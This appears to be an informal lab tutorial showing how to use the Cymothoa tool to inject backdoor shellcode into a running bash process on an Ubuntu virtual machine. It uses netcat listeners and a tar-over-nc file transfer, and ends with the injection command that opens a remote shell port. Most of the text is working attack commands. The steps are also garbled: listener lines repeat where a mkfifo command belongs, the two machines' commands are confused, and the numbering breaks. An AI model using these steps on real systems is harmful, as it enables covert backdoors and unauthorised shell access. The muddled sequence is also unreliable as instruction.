Cymothoa – Inject Shellcode into UBUNTU nc + mkfifo

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.


1. RUN cymothoa before that you must Run your Ubuntu on your Virtual BOX

2. RUN NC
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321

3.  we must make mkfifo file because will help us to comunicate with nc in Ubuntu (version nc in BT is different with nc in UBUNTU).

root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321

4. root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321

3.  and now LS in console of BT

we can see, BT can access shell Ubuntu

4. now we must sent cymatho into Ubuntu using nc

Open new terminal

    - copy file cymothoa  from /pentest/backdoors/cymothoa  

       root@bt:~# cd /pentest/backdoors/cymothoa/

       root@bt:/pentest/backdoors/cymothoa# cp cymothoa /home/
Create file .tar

       root@bt:/home# tar -cvf myfile.tar cymothoa
       root@bt:/home# ls
       cymothoa  myfile.tar  tes
OK we have file .rar
 we will sent this file.rar into Ubuntu.

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
and on terminal Ubuntu

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
Ok transfer file cymothoa  SUKSES
Now open terminal BT

5.  Ekstrak File .Tar
After that

./cymothoa

6. ps -aux

search ID /bin/bash..

.  We get ID 1326

7. ./cymothoa -p 1326 -s 0 -y 54321

Ok Success  :D

GOOD LUCK